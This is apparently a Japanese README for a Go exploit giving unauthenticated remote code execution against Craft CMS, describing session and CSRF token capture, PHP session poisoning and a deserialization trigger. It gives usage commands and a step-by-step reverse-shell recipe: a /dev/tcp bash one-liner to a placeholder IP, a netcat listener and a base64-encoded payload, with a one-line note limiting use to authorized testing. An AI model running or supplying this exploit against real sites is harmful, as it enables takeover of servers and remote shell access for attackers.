
Go製Craft CMS向けの認証前RCEエクスプロイト。セッション/CSRFトークンを取得し、PHPセッションを汚染して、コマンド実行またはリバースシェルのためのデシリアライゼーションをトリガーします。
Craft CMSに対する認証なしリモートコード実行(RCE)のエクスプロイト。Goで記述されています。
c0gnit00のオリジナル作品に基づいています。
GET /admin/login 経由でPHPセッションとCSRFトークンを取得しますassets/generate-transform 経由でデシリアライゼーションを発火させ、汚染されたファイルをインクルードして実行しますgo run main.go -u <url> -c <コマンド>
| フラグ | 説明 | 必須 |
|---|---|---|
-u | ターゲットURL(例:http://target.com) | はい |
-c | 実行するコマンド(例:id、whoami) | はい |
# Asset IDなし(自動ブルートフォース)
go run main.go -u http://target.com -c whoami
1. 自分のIPとポートを指定してペイロードをbase64で生成します:
echo 'exec sh -i >& /dev/tcp/SEU_IP/4444 0>&1' | base64
2. リスナーを開きます:
nc -lvnp 4444
3. ペイロードを指定してエクスプロイトを実行します:
go run main.go -u http://target.com -c "echo 'ZXhlYyBzaCAtaSA+JiAvZGV2L3RjcC9TRVVfSVAvNDQ0NCAwPiYxCg==' | base64 -d | bash"
base64の値は、手順1で自分の実際のIPを使用して生成したものに置き換えてください。
許可された環境および管理されたセキュリティテストでのみ使用してください。